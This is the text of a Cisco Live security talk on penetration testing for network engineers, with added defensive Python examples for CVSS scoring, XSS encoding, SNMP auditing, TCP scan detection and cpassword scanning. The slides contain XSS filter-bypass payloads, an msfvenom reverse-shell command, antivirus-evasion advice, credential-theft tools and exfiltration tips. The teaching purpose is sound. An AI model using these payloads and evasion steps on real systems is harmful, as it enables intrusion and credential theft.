Brksec 2013



Penetration Testing For Network Engineers
Know Yourself and Enemy, Need Not Fear 100 Battles
Joseph Muniz – Architect Americas
BRKSEC-2013

Cisco Webex Teams

Questions?
Use Cisco Webex Teams (formerly Cisco Spark)
to chat with the speaker after the session

How
1 Open the Cisco Events Mobile App
2 Find your desired session in the “Session Scheduler”
3 Click “Join the Discussion”
4 Install Webex Teams or go directly to the team space
5 Enter messages/questions in the team space
cs.co/ciscolivebot#BRKSEC-2013

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 3
Cat And Mouse Game (timeline figure)

Attack surface over time: Computer OS, Internet Browser, Browser Plugins, IoT, PowerShell, Phishing, etc.

The Evolution of Ransomware Variants (timeline figure, 1989 to 2018)

Timeline years: 1989, 2001, 2005, 2006, 2007, 2008, 2012, 2013, 2014, 2015, 2016, 2018.
Milestones marked: first ransomware (PC Cyborg), fake antivirus, first commercial Android phone, Bitcoin network launched, and the shift to crypto-mining at the end.
Variants named on the figure: Cyborg, GPCoder, Reveton, Urausy, Ransomlock, Redplus, QiaoZhaz, Kovter, Cryptolocker, CryptoDefense, Cryptorbit, Cokri, Koler, Simplelock, Svpeng, Virlock, Cryptowall, CoinVault, TorrentLocker, Dirty Decrypt, Cryptographic Locker, CTB-Locker, Tox, CRYZI, 73V3N, Lockdroid, Cryptvault, DMALock, Chimera, Hidden Tear, Lockscreen, Radamant, TeslaCrypt (2.0, 3.0, 4.0, 4.1), Crysis, Locky, Keranger, Nemucod, Hydracrypt, Rokku, Jigsaw, Powerware, Cerber, Petya, Cryptomix, Spora, Jaff, SamSam, WannaCry, NotPetya.

Ransomware Evolution

Threats Continue

Option 1: Hope You Are Secure

Option 2: Validate You Are Secure

Agenda

• Why Use Penetration Testing
• Penetration Testing Lab
• Testing Concepts
• Attacking Websites
• Attacking Networks
• Attacking People
• Attacking Mobile Devices
• Attacking IoT
• Reporting and Next Steps
• Conclusion
Yeay For Giveaways!

Download The CTR Comic

https://tinyurl.com/ycwt2moz

https://tinyurl.com/y6uurzuu

Joseph Muniz – Technical Security Architect

Security Architect – Americas Sales Organization
Security Researcher – www.thesecurityblogger.com
Speaker: Cisco Live / DEFCON / RSA / (ISC)2
Avid Futbal (Soccer for USA people) Player and Musician
Twitter @SecureBlogger

Goals For Penetration Testing

Cybersecurity Goals

Confidentiality = Protect sensitive data
Integrity = Ensure no unauthorised modifications
Availability = Authorised people can access it

Persistence Level

Smash n Grab – Automated attacks against anything vulnerable.
• Not targeted
• Examples: exploit kits or spam

Advanced Persistent Threat – Continuous and focused attacks against a specific target.
• Typically highly orchestrated, long-term attacks
• Usually executed in stealth by elite criminals
• Government or activist actors are common

Known and Unknown Threats

Known – Attack has been seen and characterised.
• Develop signatures for detection
• Behaviour triggers
• Domains blocked
• Antivirus / IPS leverage this

Unknown – Attack has not yet been seen or characterised.
• Signatures do not exist
• Behaviour and anomaly detection focused
• Breach detection / Sandboxing / Honeypots

Vulnerabilities

• Weakness in a system
• Configuration error, missing patch, design flaw, etc.
• Signature-based security defends against attacks (exploits) that target vulnerabilities. Examples: IPS, anti-virus

Common Vulnerabilities and Exposures (CVE)

Example risk entry:
Vulnerability Type: Apache vulnerability
Threat Description: Three vulnerabilities in the Apache Struts 2 package
Existing Controls: Firewalled and monitored by IPS
Probability: Unlikely (not web facing)
Impact: Critical

http://cve.mitre.org/about/faqs.html

Common Vulnerability Scoring System (CVSS)
Consistent standard for computing vulnerability severity.
The values below are from version 2, which is still the most used, but version 3 is the latest.

Access Vector:     Local (L) = 0.395 | Adjacent Network (AN) = 0.646
Access Complexity: High (H) = 0.35 | Medium (M) = 0.61 | Low (L) = 0.71
Authentication:    Multiple (M) = 0.45 | Single (S) = 0.56 | None (N) = 0.704
Confidentiality:   None (N) = 0.0 | Partial (P) = 0.275 | Complete (C) = 0.66
Integrity:         None (N) = 0.0 | Partial (P) = 0.275 | Complete (C) = 0.66
Availability:      None (N) = 0.0 | Partial (P) = 0.275 | Complete (C) = 0.66
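Added example (not from the deck): a small Python calculator that turns the weights in the table above into a CVSS v2 base score and maps it onto the NVD severity bands. The formula constants (10.41, 20, 1.176, the 0.6/0.4 split) and the Network access-vector weight of 1.0 come from the CVSS v2 specification, not from the slide; the vector strings scored at the bottom are constructed inputs.

```python
import math
import re

# CVSS v2 base-metric weights. The slide's values are reproduced here;
# Access Vector "Network" = 1.0 is taken from the CVSS v2 spec (not on the slide).
ACCESS_VECTOR = {"L": 0.395, "A": 0.646, "N": 1.0}
ACCESS_COMPLEXITY = {"H": 0.35, "M": 0.61, "L": 0.71}
AUTHENTICATION = {"M": 0.45, "S": 0.56, "N": 0.704}
IMPACT_WEIGHT = {"N": 0.0, "P": 0.275, "C": 0.660}   # shared by C, I and A

VECTOR_RE = re.compile(
    r"^AV:(?P<av>[LAN])/AC:(?P<ac>[HML])/Au:(?P<au>[MSN])"
    r"/C:(?P<c>[NPC])/I:(?P<i>[NPC])/A:(?P<a>[NPC])$"
)


def parse_vector(vector):
    """Split a CVSS v2 base vector such as 'AV:N/AC:L/Au:N/C:P/I:P/A:P' into its metrics."""
    m = VECTOR_RE.match(vector.strip())
    if not m:
        raise ValueError(f"not a CVSS v2 base vector: {vector!r}")
    return m.groupdict()


def round_to_1_decimal(value):
    # The v2 spec rounds half up to one decimal; math.floor avoids Python's
    # round-half-to-even behaviour on exact .x5 values.
    return math.floor(value * 10 + 0.5) / 10


def base_score(vector):
    """CVSS v2 base score, equations as given in the v2 specification."""
    m = parse_vector(vector)
    impact = 10.41 * (1 - (1 - IMPACT_WEIGHT[m["c"]])
                        * (1 - IMPACT_WEIGHT[m["i"]])
                        * (1 - IMPACT_WEIGHT[m["a"]]))
    exploitability = (20 * ACCESS_VECTOR[m["av"]]
                      * ACCESS_COMPLEXITY[m["ac"]] * AUTHENTICATION[m["au"]])
    f_impact = 0 if impact == 0 else 1.176
    return round_to_1_decimal(((0.6 * impact) + (0.4 * exploitability) - 1.5) * f_impact)


def severity(score):
    """NVD's v2 severity bands: Low 0.0-3.9, Medium 4.0-6.9, High 7.0-10.0."""
    if score >= 7.0:
        return "High"
    if score >= 4.0:
        return "Medium"
    return "Low"


def compare_exposure(vector_network, vector_internal):
    """Score the same weakness as Internet-facing and as reachable only from a
    nearby network: the 'not web facing' argument from the Struts example, in numbers."""
    return {v: base_score(v) for v in (vector_network, vector_internal)}


if __name__ == "__main__":
    # Constructed vectors: full compromise over the network, the same over an
    # adjacent network only, and a vector with no impact at all.
    for v in ("AV:N/AC:L/Au:N/C:C/I:C/A:C",
              "AV:A/AC:L/Au:N/C:C/I:C/A:C",
              "AV:L/AC:H/Au:M/C:N/I:N/A:N"):
        s = base_score(v)
        print(f"{v}  ->  {s:4.1f}  {severity(s)}")
```

Moving the same weakness from AV:N to AV:A drops the score from 10.0 to 8.3, which is the quantitative version of the "not web facing" probability note in the risk entry above; the impact sub-score is unchanged, only exploitability falls.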

Best of Breed vs Defence in Depth (figure: a single capability OR several capabilities layered)

Malware

Joey’s Shoes 2.0

Vulnerability Management Current State

Signature = recorded threat, malicious action
Anomaly = behaviour different from normal behaviour

Why Tuning Matters

Default detection is 50% - 75% effective out of the box; the rest requires tuning.

Vendor signatures (default detection, vendor feeds): general recon / protocol abuse, Heartbleed, Java vulnerabilities / exploit kits, Flash vulnerabilities, etc.
Your vulnerabilities (need the matching IPS detection capabilities enabled): server, host and configuration issues.

Security Operation Centre Services
• Risk Management – Dealing with any type of risk
• Vulnerability Management – Dealing with vulnerabilities
• Incident Response – Responding to attacks
• Audit – Checking for compliance
• Digital Forensics – Investigating breaches / legal needs
• Hacking – Unlocking features / creating new capabilities

Why First Perform a Vulnerability Assessment Before a Pentest?

Assessment vs Penetration Test

• Assessment – Using automated systems to identify potential vulnerabilities
• Penetration Test – Executing attacks against identified vulnerabilities

An assessment is good for seeing your weaknesses.
Penetration testing is good if you know you are secure.

Credential vs Non-Credential Scanning

Credential (host scan)
• Less load on the network
• Considered a “safer scan”
• Better data

Non-Credential (network scan)
• Similar to the attacker viewpoint (external view)
• Relies on ports to return correct information about the services running
• Potential false positives

SANS - Vulnerability Management

• NAC and profiling can help with asset inventory
• Triggers
  • A CVE identifier may trigger an event
  • Assessment tools
  • Audits

How to Prioritize Risk – COBIT 5 (ISACA)

Penetration Testing
Penetration Testing Starting Points

White Box – very specific work
• Know target details
• Topology given
• Informed parties
• Limited attacks

Grey Box – hybrid work
• Some details
• Some topology
• Limited awareness
• Many attacks

Black Box – attack any way possible
• No details
• Unknown topology
• No awareness
• Any attack

Statement of Work

• Define target systems
• Timeframe
• Evaluation methods
• Tools and software
• Notified parties
• Initial access level
• Authorisation
• Risks / critical operation areas
• Target space
• Define flag
• Deliverable
• Expected remediation
• Assumptions

Get out of Jail Card

• Authorisation in writing
• Signed by the right person
• State risks
• Assign liability to the stakeholder

Make sure to have this!

Hack Back Research
Search YouTube – Muniz DEFCON 26

Attackers pivot through compromised targets
• Avoid reputation security
• Remain anonymous

Hacking back may be illegal
• Uses the same tactics as the attacker!!!
• What damage can you really do?

Building A Lab
Kali Linux (BackBox is also good)
Open source penetration testing arsenal
Many great forensics tools

Download
www.kali.org

Make sure to update:
apt-get update
apt-get upgrade
Some Linux Downloads
• Masscan – https://github.com/robertdavidgraham/Masscan.git
• Gitrob – https://github.com/michenriksen/gitrob.git
• CMSmap – https://github.com/Dionach/CMSmap
• SQLMap – https://github.com/sqlmapproject/sqlmap
• WPScan – https://github.com/wpscanteam/wpscan.git
• Responder – https://github.com/SpiderLabs/Responder.git
• Mimikatz – https://github.com/gentilkiwi/mimikatz/releases/latest
• PowerSploit – https://github.com/mattifestation/PowerSploit.git
• Veil-Framework – https://github.com/Veil-Framework/Veil
• Net-Creds – https://github.com/DanMcInerney/net-creds.git
• SET – https://github.com/trustedsec/social-engineer-toolkit

Metasploit
Penetration testing tool used for executing exploit code against a remote target machine.

Hundreds of exploits available.

Search for a vulnerability and use MSF to deliver a packaged attack against the weakness.

Gain shell access, disrupt the target, etc.


Metasploit / Armitage

Defense Tools are Similar

Search struts in Firepower: lots of signatures for struts attacks come up.

Why can this be bad? Note: Ethical Security Vendors Don’t Always Tell.
Sandbox - Cuckoo

Malware looks for virtualisation processes:
• Memory, CPU, cores, VM tools, registry entries
• DLL files such as sbie.dll

https://www.cuckoosandbox.org/
TrIDNET or PEiD

Honeypot

2 public addresses - 1 for management and 1 for the honeypot services

No NAT - Some attacker services are not correctly recorded with NAT

VPS services - Lots of attacks cause termination of services

Honeypot compromises - Used to host malware and illegal content

Clonezilla

Real malware analysis means bare metal testing

VMware

Vulnerability Scanners

Credential and non-credential scanning are both key

http://sourceforge.net/projects/owaspbwa/files

Metasploitable 2

Simple Lab Example (figure)

Mac OS X running VMware Fusion with Kali Linux and Windows 7 VMs, a Kali USB Internet option, and 200 GB of mobile storage.

The Process
Attack Kill Chain

Weaponise, Deliver, Exploit, Install, Command & Control, Action

Many Targets to Consider (network figure)

Locations: HQ, branch network, users, cloud, data center, admin, roaming users
Symptoms: servers compromised, botnet communication, data loss, multiple alarms, user complaints

Vectors of an Attack

Physical
• Surveil
• Pick
• Force
• Conceal
• Persist

Digital
• Intel gather
• Scan
• Assess
• Exploit
• Persist
• Propagate
• Exfiltrate

Social
• Targeted phishing
• Conning guards/staff
• Impersonation
• Phone phishing
• Create spies

Converged attacks are the most effective and the most difficult to thwart.

Physical Attacks

Keyboard Drivers System Backdoor Network Backdoor

USB Script Options

• Poison Tap or Responder – Grab passwords from locked Windows systems
• Reverse SSH – Encrypted tunnel off the network
• Root scripts – Gain shell
• Many many more ….

https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads

Lock Picking

Door Cards – Proxmark3

https://blog.kchung.co/rfid-hacking-with-the-proxmark-3/

Digital Attacks
NMAP shows Open Ports!
Nexpose shows vulnerabilities
Metasploit delivers attack

Social Attacks

Attacking Websites

Let the fun begin …

Web Recon - Shodan.io
92% of Internet devices surveyed were running known vulnerabilities, average of 26 each

Check your scanning results against Shodan

Web Reconnaissance

• Whois – Example: 215.234.43.22@whois.arin.net
• Google Hacking – intext:classified | “this file generated by Nessus” | intitle:index.of inbox dbx
• Wayback Machine – Find old versions of a website
• Robots.txt – Pages the site wants hidden from spiders
• Banners – Free info about the system
• DIG – DNS info
• RECON-NG – Kali tool

Interrogate DNS

• Domain Information Groper (dig)
• DNSRecon in Kali Linux
• Mxtoolbox – web tool

Why is auto-blocking scanning a bad idea?

Interrogate DNS (Inside)

Find the DNS suffix in use on the domain:
• cat /etc/resolv.conf

Find the list of domain controllers:
• nslookup
• set q=SRV
• _ldap._tcp.dc._msdcs.<example.com>

Target Fingerprinting
• ICMP Port unreachable messages
• Banners
• Binaries
• Port Signatures
• Non-standard handshakes
• Response to synfloods
• Packets with non-standard TCP/IP Flags

Tools like NMAP can do this for you


Network Mapper NMAP
• NMAP
  • -sP = Network Discovery
  • -sT = Host Discovery
  • -sV = Service Interrogation
  • -sU = UDP scanning
  • -sA = Map out firewall rulesets (stateful?, filtered ports?)
  • -sF = Discover closed ports

• Hping3 - Command-line oriented TCP/IP packet assembler/analyser
Stealth / Legal

• Completing the handshake could be illegal!
• -sT = illegal | -sS = not illegal (not legal advice!)

• SYN scan – Half-open scan for stealth
• Add a delay (example: “--scan-delay 90000”)
• Send ICMP traffic with different types
• The response doesn’t matter. Looking for hosts!

Save active devices to a file:
cat alive-scan.txt | grep "report for" | awk '{print $5}' | tee alive-IPs.txt

Open Ports … Now What?

• Determine the services/daemons that are running to find exploits! (e.g. nmap -sV)
• Port numbers – www.iana.org/assignments/port-numbers
• Ports can run any service! You should interrogate by connecting to it.
• Example: telnet to port 25

Also gather other data like banners ->

OWASP Top 10

• Easy to get to, poor security and most vulnerable!
• OWASP – Great resource for news and standards

• Cross Site Scripting (XSS)
• Injection Flaws
• Malicious File Execution
• Insecure Direct Object Reference
• Cross Site Request Forgery
• Information Leakage and Improper Error Handling
• Broken Authentication and Session Management
• Insecure Cryptographic Storage
• Insecure Communications
• Failure to Restrict URL Access

OWASP ZAP

Bypass & Defeat XSS Filters

Mess with the script tag:
<script>alert(123)</script>
<script >alert(123)</script>
<script&#9>alert(123)</script>
<ScRipT>alert(123)</sCriPt>
<%00script>al%00ert(123)</script>

Pseudo-protocols:
<a href="https://www.google.com">Click Here</a>

Attributes and tags:
<input type="text" name="input" value="HI">
<input type="text" name="input" value="><script>alert(1)</script>

Event handlers:
<input onsubmit=alert(1)>

Try brackets:
<img onerror="alert(1)"src=x>
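Added example (not from the deck): the payload variants above run through a naive blocklist filter and through contextual output encoding, so the defender can see which bypasses survive each approach. The filter functions, the tag-counting heuristic and the `render_*` helpers are constructed for this demonstration; only the payload strings come from the slide.

```python
import html
import re

# The payload variants from the slide, embedded here as constructed test input.
PAYLOADS = [
    "<script>alert(123)</script>",
    "<script >alert(123)</script>",
    "<ScRipT>alert(123)</sCriPt>",
    "<input onsubmit=alert(1)>",
    '<img onerror="alert(1)"src=x>',
]

# Anything a browser would treat as the start of a tag: '<', optional whitespace, a letter.
TAG_START = re.compile(r"<\s*[a-z]", re.IGNORECASE)


def naive_filter(value):
    """A blocklist filter of the kind the slide shows being bypassed:
    it strips the exact strings '<script>' and '</script>' and nothing else."""
    return value.replace("<script>", "").replace("</script>", "")


def escape_for_html(value):
    """Hardened alternative: contextual output encoding. html.escape turns
    < > & " ' into entities, so no tag or attribute boundary survives."""
    return html.escape(value, quote=True)


def count_tags(rendered):
    """Rough demo metric: how many tag starts remain in the rendered output."""
    return len(TAG_START.findall(rendered))


def bypasses(filter_fn, payloads=PAYLOADS):
    """Return the payloads that still contain a tag start after filter_fn ran."""
    return [p for p in payloads if count_tags(filter_fn(p)) > 0]


def render_unsafe(user_value):
    # Reflects the value straight into the attribute (the slide's value="..." example).
    return f'<input type="text" name="input" value="{user_value}">'


def render_safe(user_value):
    # Same template, but the value is encoded for the attribute context first.
    return f'<input type="text" name="input" value="{escape_for_html(user_value)}">'


if __name__ == "__main__":
    print("bypass naive blocklist:", bypasses(naive_filter))
    print("bypass html.escape    :", bypasses(escape_for_html))
    attr_payload = '"><script>alert(1)</script>'   # the attribute break-out from the slide
    print("tags in unsafe render:", count_tags(render_unsafe(attr_payload)))  # input + injected script
    print("tags in safe render  :", count_tags(render_safe(attr_payload)))    # only the input
```

The blocklist stops exactly one of the five variants (the literal lowercase tag); the case change, the embedded whitespace and the event-handler attributes all pass straight through. Encoding for the output context leaves nothing for the parser to treat as markup, which is why the OWASP guidance favours output encoding over pattern blocking.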

XSSer

Summarising Web Testing (figure)

Attacking Networks
Plugging into Networks

• No security = Instant access
• Port security = Possibly a static MAC list
• NAC = Need to beat the assessment profile
• NAC is port driven, try weird ports

Spoofing trusted devices may work

Hacking SNMP

• Default community strings – public / private
• Spoof the address of the manager or devices
• Typically won’t notice “quiet” devices
• Brute force SNMP authentication
• Typically not monitored
• SNMP walking – Try strings across multiple systems
• SNMP brute force – Run a .txt file of strings
• SNMP attacking – Abuse when RW is enabled

Attacking SNMP
Onesixtyone – Brute force with a text file

snmpwalk or snmp-check – Test various community strings

Public exists, private doesn’t

Change SNMP if RW is enabled!
Find it by grepping for v1
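Added example (not from the deck): the defender's side of the two SNMP slides above, a Python audit of an IOS-style configuration that flags default community strings, read-write communities with and without an ACL, and trap hosts still on SNMP v1/v2c. The configuration fragment, the regexes and the severity labels are constructed for the demo and are not taken from the slides or from any real device.

```python
import re

# Constructed IOS-style configuration fragment for the demo.
SAMPLE_CONFIG = """\
hostname edge-rtr-1
snmp-server community public RO
snmp-server community private RW
snmp-server community s3cr3t-ops RW 10
snmp-server group NETMON v3 priv
snmp-server host 10.1.1.50 version 2c public
snmp-server host 10.1.1.51 version 3 priv netmon-user
"""

# The two strings the slide names as defaults.
DEFAULT_COMMUNITIES = {"public", "private"}

# 'snmp-server community <string> [view <name>] [RO|RW] [<acl>]'
COMMUNITY_RE = re.compile(
    r"^snmp-server community (\S+)(?:\s+view\s+\S+)?(?:\s+(RO|RW))?(?:\s+(\S+))?\s*$",
    re.IGNORECASE,
)
# 'snmp-server host <addr> ... version <1|2c|3> ...'
HOST_RE = re.compile(r"^snmp-server host (\S+)\b.*?\bversion (1|2c|3)\b", re.IGNORECASE)


def audit_snmp(config_text):
    """Return (line number, severity, message) tuples for weak SNMP settings."""
    findings = []
    for lineno, raw in enumerate(config_text.splitlines(), 1):
        line = raw.strip()
        m = COMMUNITY_RE.match(line)
        if m:
            community = m.group(1)
            mode = (m.group(2) or "RO").upper()   # IOS defaults a community to read-only
            acl = m.group(3)
            if community.lower() in DEFAULT_COMMUNITIES:
                findings.append((lineno, "HIGH", f"default community string '{community}'"))
            if mode == "RW" and acl is None:
                findings.append((lineno, "HIGH", f"read-write community '{community}' with no ACL"))
            elif mode == "RW":
                findings.append((lineno, "MEDIUM",
                                 f"read-write community '{community}' limited by ACL {acl}"))
            continue
        m = HOST_RE.match(line)
        if m and m.group(2) != "3":
            findings.append((lineno, "MEDIUM",
                             f"trap/inform host {m.group(1)} uses SNMP v{m.group(2)} "
                             "(community string sent in cleartext)"))
    return findings


def severity_counts(findings):
    counts = {"HIGH": 0, "MEDIUM": 0}
    for _, sev, _ in findings:
        counts[sev] = counts.get(sev, 0) + 1
    return counts


if __name__ == "__main__":
    results = audit_snmp(SAMPLE_CONFIG)
    for lineno, sev, msg in results:
        print(f"line {lineno}: [{sev}] {msg}")
    print(severity_counts(results))
```

Run against a real backup the same way (`audit_snmp(open("running-config").read())`); a community that a brute-force tool such as the ones named above would find in seconds shows up here as a HIGH line before anyone has to scan for it.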

Viewing Network Data

• Inline – direct, real-time live traffic
• SPAN port – copy of traffic
• PCAP = historical
• Live capture should have filtering (example: tcpdump filter on POST)

Wireshark display filter examples:
tcp.flags.syn && tcp.flags.ack==0
tcp.flags.syn==1 && tcp.flags.ack==1
tcp.flags.reset && tcp.flags.ack
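Added example (not from the deck): a Python parser for the fixed TCP header that classifies each packet into the same three states the display filters above select (SYN, SYN-ACK, RST-ACK), then applies the classification to a constructed capture to spot the half-open SYN scan pattern described on the Stealth / Legal slide. The header builder, the sample packets and the `half_open_scanners` threshold are constructed for the demo.

```python
import struct
from collections import Counter, defaultdict

# TCP flag bits in the low byte of the data-offset/flags field (RFC 793).
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20


def parse_tcp_header(data):
    """Parse the fixed 20-byte TCP header; options, if present, are ignored."""
    if len(data) < 20:
        raise ValueError("truncated TCP header")
    src, dst, seq, ack, off_flags, window, _csum, _urg = struct.unpack("!HHIIHHHH", data[:20])
    return {
        "src_port": src, "dst_port": dst, "seq": seq, "ack": ack,
        "data_offset": (off_flags >> 12) * 4,   # header length in bytes
        "flags": off_flags & 0x01FF,            # 9 flag bits (NS plus the 8 classic ones)
        "window": window,
    }


def classify(flags):
    """Map a flags value onto the handshake states the Wireshark filters above select."""
    if flags & SYN and not flags & ACK:
        return "SYN"          # tcp.flags.syn && tcp.flags.ack==0
    if flags & SYN and flags & ACK:
        return "SYN-ACK"      # tcp.flags.syn==1 && tcp.flags.ack==1
    if flags & RST and flags & ACK:
        return "RST-ACK"      # tcp.flags.reset && tcp.flags.ack
    if flags & RST:
        return "RST"
    if flags & FIN:
        return "FIN"
    return "OTHER"


def build_tcp_header(src_port, dst_port, flags, seq=0, ack=0, window=65535):
    """Constructed test header (checksum left zero): sample data, not a real capture."""
    off_flags = (5 << 12) | (flags & 0x01FF)
    return struct.pack("!HHIIHHHH", src_port, dst_port, seq, ack, off_flags, window, 0, 0)


def summarize(packets):
    """packets: iterable of (src_ip, dst_ip, tcp_bytes). Count packets per handshake state."""
    return Counter(classify(parse_tcp_header(raw)["flags"]) for _, _, raw in packets)


def half_open_scanners(packets, min_ports=5):
    """Sources that sent SYNs to at least min_ports distinct ports on one host and never
    completed a handshake there (no bare ACK back): the half-open scan signature."""
    syn_ports = defaultdict(set)
    completed = set()
    for src_ip, dst_ip, raw in packets:
        hdr = parse_tcp_header(raw)
        kind = classify(hdr["flags"])
        key = (src_ip, dst_ip)
        if kind == "SYN":
            syn_ports[key].add(hdr["dst_port"])
        elif kind == "OTHER" and hdr["flags"] & ACK:
            completed.add(key)   # third packet of a handshake, or later data
    return sorted({src for (src, dst), ports in syn_ports.items()
                   if len(ports) >= min_ports and (src, dst) not in completed})


# Constructed sample traffic: one legitimate handshake from 10.0.0.5 and a SYN sweep
# across six ports from 10.0.0.9, two of which answer RST-ACK (closed).
SAMPLE = [
    ("10.0.0.5", "10.0.0.80", build_tcp_header(51000, 80, SYN, seq=1)),
    ("10.0.0.80", "10.0.0.5", build_tcp_header(80, 51000, SYN | ACK, seq=100, ack=2)),
    ("10.0.0.5", "10.0.0.80", build_tcp_header(51000, 80, ACK, seq=2, ack=101)),
] + [
    ("10.0.0.9", "10.0.0.80", build_tcp_header(40000 + p, p, SYN)) for p in (21, 22, 23, 25, 80, 443)
] + [
    ("10.0.0.80", "10.0.0.9", build_tcp_header(p, 40000 + p, RST | ACK)) for p in (21, 23)
]

if __name__ == "__main__":
    print(summarize(SAMPLE))
    print("half-open scanners:", half_open_scanners(SAMPLE))
```

The SYN / SYN-ACK ratio from `summarize` is the quick check a PCAP reviewer does by eye with the first two filters; `half_open_scanners` is the same idea made mechanical, keyed on the source never sending the bare ACK that would complete the handshake.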

Network MiTM

• Get network traffic through your device
• ARP poison
• Inline
• Proxy (network or host)

PacketSquirrel | Ettercap = Easy Testing

WiFi MiTM
Karma – Ability to clone SSIDs and man-in-the-middle the mobile device

SSL-Strip – Removing HTTPS request so authentication is in the clear.

Defending
• VPN
• Disable Auto WiFi Connect
• WIDS/WIPS
• Remove HTTP from critical servers

How Easy is Getting Wireless MiTM?
WiFi Pineapple
• Wireless pentesting tool
• Can spoof an SSID and perform an SSL-Strip
• Cost: $100 - $200 dollars from Hak5

Raspberry Pi
• $35 dollar computer
• Can host any OS including Kali Linux
• Kali Linux offers multiple penetration testing applications

Responder – LLMNR / NBT-NS / WPAD

NBT-NS – Microsoft left it enabled for legacy / compatibility reasons
LLMNR – Similar to DNS, using multicast and peer-to-peer communication for name resolution
WPAD – Provides a proxy auto-config (PAC) file to hosts looking to get to the Internet

These broadcasting protocols can be exploited for grabbing hashes taken during the handshake process!

Metasploit modules:
auxiliary/spoof/llmnr/llmnr_response
auxiliary/spoof/nbns/nbns_response
auxiliary/server/capture/smb
Windows - ShareCheck

• Use of non-standard local admin accounts
• Windows file sharing vulnerabilities
• Global groups granted local admin access
• Insecure account lockout

http://www.sec-1.com/blog/2014/sharecheck

Exfiltration

• Allow remote root – in /etc/ssh/sshd_config, comment out “PermitRootLogin no”
• Netcat
• Create an account on an existing FTP / SSH service
• Lightweight FTP – BabyFTP | Vsftpd | Mollensoft FTP

Avoid Trojans and keyloggers – painful cleanup!

Attacking People
You can be anybody

Emily Williams
• Total Connections: 170 employees, 71 Cisco; 22 NetApp; 10 EMC; 35 McAfee; 300+ Facebook friends
• Endorsements: 22 LinkedIn endorsements, for expertise and experience, from partners and co-workers
• Offers: 4 job offers, laptop and office equipment, network access

Speak Like Your Target

• Use Facebook and LinkedIn as a weapon
• What do you leave on social networks that could be used against you?
• Hide attacks in social media messages
• Read their e-mail / posts / etc. and learn their language

Phishing / Spear Phishing

• Best to customize based on recon
• Tie it to a holiday / event
• Language is everything!
• Goal can be info or causing an action

Practice this skill

Phishing Emails

Browser Injection Framework (BeEF)
• Hook victim browsers as beachheads for attacks
• Social engineer to click customized link
• Available attacks depend on current browser
vulnerabilities
• Can track hooked systems

Social Engineering Tool Kit (SET)
• Easily clone a website
• Create various phishing attacks
• Create payload and listener
• Mailer attacks
• Powershell attacks
• And many many more ….

Business Email Compromise (example exchange)

Attacker (john@ciscco.com): We have conference dues to pay that are late. Pay at www.hackme.com/dues

Cisco Financial (bob1@cisco.com): Ok I’m on it!

Attacking Endpoints
Packing Malware 101
Bypass signature-based detection

Executable = (un)packer + payload
• (Un)Packer – frequently changed
• Payload (unpacked malware) – changed less frequently
Weaponize: RAT vs Dropper

Dropper – Beaconing software that doesn’t provide a full tunnel and can call back with desired data
RAT – Full tunnel to the compromised system

Empire – PowerShell tool that can communicate using a dropper
Metasploit – Delivers Meterpreter payloads that can be installed on victim systems

Encoding – Create Backdoor
Metasploit:
msfvenom -p python/meterpreter/reverse_tcp LHOST=ANYIP LPORT=ANYPORT R > anyname.py

Testing Encoding
• Metasploit has encoders but they are detected
• Shellter
• Veil Framework
• Building custom Python or PowerShell connectors

Test against VirusTotal + a few antivirus vendors
• Even if your file is clean on VT, samples are downloaded
• Vendors find zero days by checking clean files
• Use your own systems to test (script and invest)

Maybe test with advanced breach detection products

Testing RATs

RATs are detected by AV
• Use a PowerShell or Python framework (Windows or Mac)

EggShell – Python-based RAT framework (Mac)
• Viralmaniar PowerShell RAT is another example

Infects by connecting back to a public server
• Send a phishing link
• Send an uninfected file with an icon link hosted remotely

Metasploit Framework for Undetectable Malware

PowerShell Empire

• Exploit framework targeting Windows
• Listener – Waits for a connection
• Stager – Code placed on the compromised system
• Agent – Maintains the connection between you and the victim
• Runs commands in memory
• Antivirus hates this!

Example: Phishing Phishers (Magic land)

Step 1: Set up a safe place to interact with the phisher - Sandbox
Step 2: Act stupid - Talk about The Matrix and the Blackhat movie
Step 3: Wrap sharing software with malware
Step 4: Frustrate the phisher. Offer the sharing software to help show why things are not working

Privilege Escalation

• Cpasswords – Group Policy Preferences passwords are encrypted but reversible
• GP3finder simplifies this:
gp3finder.py -A -t DOMAIN_CONTROLLER -u DOMAINUSER

• Mimikatz – Meterpreter password extraction

• Incognito – Enumerate and impersonate tokens
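The defender's version of the cpassword check is an audit of SYSVOL for preference items that still store one. As an added example (not from the deck and not gp3finder's code), the following Python parses a constructed Groups.xml and reports every item carrying a non-empty cpassword, without decrypting anything; the file list and account-attribute names are assumptions. Because the encryption key is public, the remediation is to delete the offending preference items and rotate the accounts they set.

```python
import xml.etree.ElementTree as ET
from pathlib import Path

# Constructed sample Groups.xml in the shape Group Policy Preferences writes;
# the cpassword value is a placeholder, not a real encrypted credential.
SAMPLE_GROUPS_XML = """<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User name="LocalAdmin" changed="2017-06-01 12:00:00">
    <Properties action="U" userName="LocalAdmin" neverExpires="1"
                cpassword="PLACEHOLDER_CPASSWORD_VALUE"/>
  </User>
  <User name="Helpdesk" changed="2017-06-02 09:30:00">
    <Properties action="C" userName="Helpdesk" cpassword=""/>
  </User>
</Groups>"""

# GPP preference files that can carry a cpassword attribute (assumed list).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
# Each preference type names the account attribute differently.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs")


def find_cpasswords(xml_text, source="<string>"):
    """Return one finding per preference item storing a non-empty cpassword."""
    findings = []
    root = ET.fromstring(xml_text.encode("utf-8"))   # bytes: tolerates an XML declaration
    for item in root:
        props = item.find("Properties")
        if props is None or not props.get("cpassword"):
            continue                                  # absent or empty: nothing stored
        account = next((props.get(a) for a in ACCOUNT_ATTRS if props.get(a)), "?")
        findings.append({"file": source, "item": item.get("name", item.tag),
                         "account": account, "changed": item.get("changed")})
    return findings


def scan_sysvol(sysvol_root):
    """Walk a SYSVOL copy or share mount and collect every stored cpassword."""
    findings = []
    for path in Path(sysvol_root).rglob("*.xml"):
        if path.name in GPP_FILES:
            findings.extend(find_cpasswords(path.read_text(encoding="utf-8-sig"), str(path)))
    return findings
```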
Password Cracking Concepts
• BIOS – Try the manufacturer password
• Guessing or recovering a password
(admin | password | cisco | blank | vendor name)
• Dictionary / Rainbow Tables
